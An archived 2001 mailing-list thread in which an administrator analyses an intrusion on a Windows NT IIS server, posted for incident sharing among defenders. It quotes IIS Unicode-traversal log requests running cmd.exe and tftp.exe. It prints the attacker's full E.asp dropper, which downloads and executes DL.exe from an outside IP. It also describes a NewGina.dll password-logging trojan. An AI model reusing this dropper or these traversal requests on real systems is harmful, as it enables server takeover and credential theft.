Security Incidents mailing list archives

Re: Some details in a recent NT hack we encountered

From: Ron Grove <rgrove () HOTMAIL COM>
Date: Sun, 25 Feb 2001 22:21:11 -0700

I sent an update after this posting that explains what we found on that
after some more investigation.  I have appended it below your message.  In
short the log was created by a trojan called NewGina.dll.  We knew it had to
be created by something that was associated with logons so msgina.dll (or in
our case awgina.dll) was a good place to start.  Searching for "gina" turned
up "NewGina.dll" which immediately explained what was going on and was what
was creating the logs (to answer that question).  Some redirection in the
registry was how the intercept was pulled off.  We suspect a kit, because
everything about the breakin appeared to lack skill or polish.  Easy to
catch quickly and didn't clean anything up.  With the access he had one
would expect better...  They used the unicode thing to load dl.exe and
company.  I don't know exactly where he got SYSTEM access, but I expect
somehow through dl.exe?  If anyone wants it it's all theirs of course.

Ron

I have CC:'d you because I don't know how long before this actually gets
posted.  The moderator appears to be (very uderstandably) less aggressive on
Friday afternoons and weekends. :-)  You wouldn't have seen it until Monday
if it were me at the helm...

From: Gossi The Dog <gossi () OWNED LAB6 COM>
Reply-To: Gossi The Dog <gossi () OWNED LAB6 COM>
To: INCIDENTS () SECURITYFOCUS COM
Subject: Re: Some details in a recent NT hack we encountered
Date: Wed, 28 Feb 2001 21:48:23 +0000

On Sat, 24 Feb 2001, Ron Grove wrote:

> Hello,
>
> Just wanted to share some of the footprints of a hack that we had on a

<snip>

Ok, three points here.

First off, the IIS unicode exploit does not give you SYSTEM or
Administrator privs.  So how are they getting those (they'll need them to
make those dirs and set permissions etc).

Secondly, what program is generating those WinLogon logs?  Not seen that
before at all, very interesting.

Thirdly, could this be a worm?  If it is, erm, eek.

Regards,
Gossi.


Just wanted to share some of the footprints of a hack that we had on one of
our NT servers.  This is not everything I am sure.  It was too important to
rebuild and secure the server for the users usage again.  If anyone else has
noticed this please let me know.  We are curious what else was put on the
machine beyond what we found.  Attempts were made against other servers as
well.

Config:
Windows NT 4.0 with SP6a
Runs Exchange 5.5 SP4, IIS 4.0, MS Proxy Server 2.0

Initially noticed logfile problem with UNICODE exploit.  Then noticed
os2srv.exe running in taskmanager and as a service.  os2srv.exe was then
killed and sud.exe appeared out of nowhere in processes.  Can't find sud.exe
so find is possibly trojaned.

They initially got in with the UNICODE exploit from a few months back.  Here
is the snip from the logs:

xxx.xxx.xxx.xxx, -, 2/15/01, 20:41:28, W3SVC1, OURSERVER, xxx.xxx.xxx.xxx,
234, 140, 1650, 200, 0, GET, /scripts/../../winnt/system32/cmd.exe,
/c+dir+c:\,
xxx.xxx.xxx.xxx, -, 2/15/01, 20:41:54, W3SVC1, OURSERVER, xxx.xxx.xxx.xxx,
188, 141, 379, 502, 0, GET, /scripts/../../winnt/system32/attrib.exe,
E.asp+-r,
xxx.xxx.xxx.xxx, -, 2/15/01, 20:42:20, W3SVC1, OURSERVER, xxx.xxx.xxx.xxx,
16, 142, 396, 502, 0, GET, /scripts/../../winnt/system32/cmd.exe,
/c+del+E.asp,
xxx.xxx.xxx.xxx, -, 2/15/01, 20:42:26, W3SVC1, OURSERVER, xxx.xxx.xxx.xxx,
2265, 163, 415, 502, 0, GET, /scripts/../../winnt/system32/tftp.exe,
-i+rooted.ntserver.com+get+E.asp,
xxx.xxx.xxx.xxx, -, 2/15/01, 20:42:34, W3SVC1, OURSERVER, xxx.xxx.xxx.xxx,
1781, 101, 225, 200, 0, GET, /scripts/E.asp, -,
xxx.xxx.xxx.xxx, -, 2/15/01, 20:42:37, W3SVC1, OURSERVER, xxx.xxx.xxx.xxx,
15, 196, 355, 502, 0, GET, /scripts/../../winnt/system32/attrib.exe,
E.asp+-r,
xxx.xxx.xxx.xxx, -, 2/15/01, 20:42:41, W3SVC1, OURSERVER, xxx.xxx.xxx.xxx,
15, 197, 355, 502, 0, GET, /scripts/../../winnt/system32/cmd.exe,
/c+del+E.asp,

We contacted the source IP who had been contacted by another attacked site.
A CERT report was already generated by the other party.  The text of E.asp
is:

<%
Set fs = CreateObject("Scripting.FileSystemObject")
Set drv = fs.Drives
dmax = ""
dmac = 0
For each d in drv
If d.Driveletter <> "A" And d.IsReady Then
If d.AvailableSpace > dmac then
dmac = d.AvailableSpace
dmab = d.DriveType
dmaa = d.TotalSize
dmad = d.SerialNumber
dmax = d.DriveLetter
End If
End If
Next
filename = server.mappath("dl.bat")
Set tf = fs.CreateTextFile(filename, True)
tf.WriteLine("@echo off")
tf.WriteLine("cd \Inetpub\scripts")
tf.WriteLine("startDL:")
tf.WriteLine("tftp.exe -i 216.205.125.115 get DL.exe")
tf.WriteLine("if not exist DL.exe goto startDL")
tf.WriteLine("start /w DL.exe")
tf.WriteLine("ren 00.D install.bat")
tf.WriteLine("attrib TFTP* -r")
tf.WriteLine("attrib DL.exe -r")
tf.WriteLine("del TFTP*")
tf.WriteLine("del DL.exe")
tf.WriteLine("install.bat %1")
tf.WriteLine("exit")
tf.Close
dim command
dim wshShell
command = server.mappath("dl.bat") & " " & dmax
On Error Resume Next
Set wshShell = CreateObject("WScript.Shell")
wshShell.Run (command)
If Err Then
Set objFSO = Server.CreateObject("scripting.filesystemobject")
pathname = server.mappath("dl.bat")
objFSO.DeleteFile pathname
Set objFSO = Nothing
Else
Response.Write "|" & dmax & "*" & dmab & "*" & dmac & "*" & dmaa & "*" &
dmad
End If
%>
----------------------------
This file downloads DL.exe from the remote host, executes it (which
uncompresses a group of files) then runs an install.
A directory listing follows:
-----------------------------
09/24/1997  12:06a               1,942 environ.ksh
09/24/1997  12:06a               1,323 profile.ksh
02/20/2001  04:52p               1,289 E.asp
02/20/2001  05:11p               5,120 DL.exe
02/20/2001  05:12p               2,201 00.D
02/20/2001  05:12p                  64 01.D
02/20/2001  05:12p              32,256 02.D
02/20/2001  05:12p                 344 03.D
02/20/2001  05:12p             349,696 04.D
02/20/2001  05:12p              28,672 05.D
02/20/2001  05:12p              24,576 06.D
02/20/2001  05:12p              70,211 07.D
02/20/2001  05:12p              18,276 08.D
02/20/2001  05:12p              28,432 09.D
02/20/2001  05:12p              35,981 10.D
02/20/2001  05:12p             427,520 11.D
02/20/2001  05:12p              12,288 12.D
02/20/2001  05:12p               6,867 13.D

00.D gets renamed to install.bat, then executed.

A new directory also appears about this time.  It is found in a different
drive (in our case E:\ since D:\ was the CDROM).  It is under a new
directory call E:\Adminback0801\root\system\dll and nothing is in it.

In the C:\Winnt\System32\os2\ directory a new hidden folder called "New" was
present.  I contained:
FireDaemon.exe
dir.txt
login.txt
RemScan.txt
SUD.exe
SUD.bak

It's security was set to SYSTEM Full Access.  FireDaemon was used to create
an INDEX service and a OS2SRV service.

A trojan .dll was placed in C:\Winnt\System32 called NewGina.dll.
HKLM/Software/Windows NT/Software/Winlogon/NewGina key was created with the
path to the NewGina trojan.  A key called OriginalGinaDll was created with
pcAnywhere's awgina.dll entry.  NewGina.dll creates a .tmp file on C:\ that
captures logon passwords.  It is appended to with the current password after
every logon so that changed passwords are also caught.  The file is
formatted and produced by the NewGina.dll and contains the following text:

WlxNegotiate.
WlxInitialize.
WlxDisplaySASNotice.
WlxLoggedOutSAS, SasType=1.
WlxDisplaySASNotice.
WlxDisplaySASNotice.
WlxLoggedOutSAS, SasType=1.
user Administrator has logged on to domain OURSERVER with password
CURRENT_ADMIN_PASSWORD.
user is a member of the Administrators group.
returned profile information:
  type 2
  profile path: (null)
  policy path: \\OURSERVER\netlogon\ntconfig.pol
  server: \\OURSERVER
  LOGONSERVER=\\OURSERVER
WlxActivateUserShell.
WlxLoggedOnSAS, SasType=1.
WlxDisplayLockedNotice.
WlxWkstaLockedSAS, SasType=1.
WlxLoggedOnSAS, SasType=1.
WlxDisplayLockedNotice.
WlxIsLockOk.
WlxDisplayLockedNotice.
WlxIsLockOk.
WlxDisplayLockedNotice.
WlxWkstaLockedSAS, SasType=1.
WlxLoggedOnSAS, SasType=1.
WlxDisplayLockedNotice.
WlxIsLockOk.
WlxDisplayLockedNotice.
WlxWkstaLockedSAS, SasType=1.
WlxLoggedOnSAS, SasType=1.

A new ftp server is also installed called UServ or something like that (I
forget right now).  Too much to try to clean so rebuilding and securing is
probably the best route.

Hope this helps someone.

Thanks,
Ron
_________________________________________________________________
Get your FREE download of MSN Explorer at http://explorer.msn.com

Current thread:

Some details in a recent NT hack we encountered Ron Grove (Feb 24)
- Re: Some details in a recent NT hack we encountered Gossi The Dog (Feb 24)
- <Possible follow-ups>
- Re: Some details in a recent NT hack we encountered Matt Scarborough (Feb 25)
  - Re: Some details in a recent NT hack we encountered Gossi The Dog (Feb 26)
- Re: Some details in a recent NT hack we encountered Matt Scarborough (Feb 25)
- Re: Some details in a recent NT hack we encountered Ron Grove (Feb 25)
- Re: Some details in a recent NT hack we encountered Matt Scarborough (Feb 26)
- Re: Some details in a recent NT hack we encountered Matt Scarborough (Feb 27)
  - Re: Some details in a recent NT hack we encountered Gossi The Dog (Feb 28)